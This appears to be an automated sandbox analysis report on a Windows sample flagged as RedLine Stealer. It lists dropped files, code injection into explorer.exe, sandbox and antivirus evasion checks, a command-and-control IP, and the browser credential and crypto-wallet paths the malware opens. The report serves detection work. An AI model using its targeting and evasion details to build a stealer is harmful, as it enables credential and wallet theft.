          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-datetime-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l2-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-heap-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-interlocked-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-2-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-sysinfo-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-timezone-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-util-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-conio-l1-1-0.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\libcrypto-1_1.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\ZTGJILHXQB VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Documents\BPMLNOBVSB VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Documents\My Music VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Documents\My Pictures VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Documents\NEBFQQYWPS VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Documents\ZTGJILHXQB VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Music VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
          Source: C:\Windows\explorer.exeCode function: 4_2_0E91531C GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,4_2_0E91531C
          Source: C:\Windows\explorer.exeCode function: 4_2_0E904B50 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,4_2_0E904B50
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F404F10 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,17_2_00007FF69F404F10
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A8332F0 GetVersionExW,0_2_00007FF63A8332F0
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exeBinary or memory string: procmon.exe
          Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exeBinary or memory string: procexp.exe
          Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exeBinary or memory string: autoruns.exe
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

          Stealing of Sensitive Information

          barindex
          Yara detected RedLine Stealer
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 9.0.4A64.tmp.x.exe.a90000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.1943024821.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.1943582623.0000000000A92000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 4A64.tmp.x.exe PID: 3484, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe, type: DROPPED
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
          Source: Yara matchFile source: 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 4A64.tmp.x.exe PID: 3484, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected RedLine Stealer
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 9.0.4A64.tmp.x.exe.a90000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.1943024821.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.1943582623.0000000000A92000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 4A64.tmp.x.exe PID: 3484, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe, type: DROPPED

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		12
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts13
          Native API          		1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		1
          Credential API Hooking          		1
          Account Discovery          		Remote Desktop Protocol2
          Data from Local System          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Shared Modules          		Logon Script (Windows)1
          Access Token Manipulation          		1
          Abuse Elevation Control Mechanism          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Credential API Hooking          		1
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          Exploitation for Client Execution          		Login Hook1012
          Process Injection          		2
          Obfuscated Files or Information          		NTDS136
          System Information Discovery          		Distributed Component Object Model3
          Clipboard Data          		2
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Registry Run Keys / Startup Folder          		1
          Timestomp          		LSA Secrets681
          Security Software Discovery          		SSHKeylogging122
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials351
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Rootkit          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt351
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          Access Token Manipulation          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1012
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
          Hidden Files and Directories          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1568551 Sample: file.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 7 other signatures 2->74 9 file.exe 1 3 2->9         started        process3 file4 54 C:\Users\user\...\7D3ED97FB83B796922796.exe, PE32+ 9->54 dropped 56 7D3ED97FB83B796922...exe:Zone.Identifier, ASCII 9->56 dropped 84 Found evasive API chain (may stop execution after checking mutex) 9->84 86 Found API chain indicative of debugger detection 9->86 88 Contains functionality to inject threads in other processes 9->88 90 9 other signatures 9->90 13 svchost.exe 7 9->13         started        17 audiodg.exe 7 9->17         started        19 msiexec.exe 7 9->19         started        signatures5 process6 dnsIp7 66 176.111.174.140, 1912, 49730, 49731 WILWAWPL Russian Federation 13->66 120 Found evasive API chain (may stop execution after checking mutex) 13->120 122 Found API chain indicative of debugger detection 13->122 124 Contains functionality to inject threads in other processes 13->124 21 explorer.exe 38 6 13->21 injected 126 Changes the view of files in windows explorer (hidden files and folders) 17->126 128 Injects code into the Windows Explorer (explorer.exe) 17->128 130 Writes to foreign memory regions 17->130 132 Creates a thread in another existing process (thread injection) 19->132 134 Injects a PE file into a foreign processes 19->134 signatures8 process9 file10 50 C:\Users\user\AppData\...\7405.tmp.zx.exe, PE32+ 21->50 dropped 52 C:\Users\user\AppData\...\4A64.tmp.x.exe, PE32 21->52 dropped 76 System process connects to network (likely due to code injection or exploit) 21->76 78 Benign windows process drops PE files 21->78 80 Found evasive API chain (may stop execution after checking mutex) 21->80 82 Contains functionality to inject threads in other processes 21->82 25 7405.tmp.zx.exe 52 21->25         started        29 7D3ED97FB83B796922796.exe 3 21->29         started        31 7D3ED97FB83B796922796.exe 3 21->31         started        33 4A64.tmp.x.exe 5 4 21->33         started        signatures11 process12 file13 58 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 25->58 dropped 60 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 25->60 dropped 62 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 25->62 dropped 64 47 other files (7 malicious) 25->64 dropped 92 Multi AV Scanner detection for dropped file 25->92 94 Machine Learning detection for dropped file 25->94 35 7405.tmp.zx.exe 25->35         started        96 Found evasive API chain (may stop execution after checking mutex) 29->96 98 Found API chain indicative of debugger detection 29->98 100 Contains functionality to inject threads in other processes 29->100 114 2 other signatures 29->114 37 svchost.exe 29->37         started        39 audiodg.exe 29->39         started        41 msiexec.exe 29->41         started        102 Writes to foreign memory regions 31->102 104 Allocates memory in foreign processes 31->104 116 2 other signatures 31->116 43 msiexec.exe 31->43         started        46 audiodg.exe 31->46         started        48 svchost.exe 31->48         started        106 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 33->106 108 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 33->108 110 Tries to harvest and steal browser information (history, passwords, etc) 33->110 112 Tries to steal Crypto Currency Wallets 33->112 signatures14 process15 signatures16 118 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 43->118

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe63%ReversingLabsWin64.Trojan.Ulise
          file.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe74%ReversingLabsWin32.Trojan.Jalapeno
          C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe21%ReversingLabsWin64.Malware.Generic
          C:\Users\user\AppData\Local\Temp\_MEI26522\VCRUNTIME140.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\_bz2.pyd0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\_ctypes.pyd0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\_hashlib.pyd0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\_lzma.pyd0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\_socket.pyd0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
